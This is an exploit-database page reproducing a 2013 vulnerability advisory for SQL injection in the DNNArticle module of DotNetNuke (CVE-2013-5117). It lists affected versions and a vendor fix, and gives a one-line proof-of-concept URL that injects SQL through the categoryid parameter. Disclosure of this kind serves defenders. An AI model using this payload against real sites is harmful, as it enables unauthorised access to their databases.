[] NeoSense
E X P L O I T S
title author type platform port cve id

DotNetNuke DNNArticle Module 10.0 - SQL Injection

Author: Sajjad Pourali
type: webapps
platform: php
port: 
date_added: 2013-08-15 
date_updated: 2013-08-16 
verified: 1 
codes: CVE-2013-5117;OSVDB-96306 
tags: 
aliases:  
screenshot_url:  
application_url: 
Title: DotNetNuke (DNNArticle Module) SQL Injection Vulnerability
References: CVE-2013-5117
Discovered by: Sajjad Pourali

Vendor http://www.zldnn.com/ , http://www.dnnarticle.com/‎
Vendor advisory: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)
Vendor contact: 2013-8-14

Solution: http://www.zldnn.com/Support/tabid/643/ctl/RecordList/mid/1691/ItemID/2979/Default.aspx (Ticket iD:#2979)

Remote: yes
Authentication required: no
User interaction required: no
Impact: High

Affected:

 - DNNArticle 10.0 and earlier

---

PoC:

http://server/desktopmodules/dnnarticle/dnnarticlerss.aspx?moduleid=0&categoryid=1+or+1=@@version

---

 + Sajjad Pourali
 + http://www.securation.com/
 + http://www.cert.um.ac.ir/
 + Contact: sajjad[at]securation.com
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.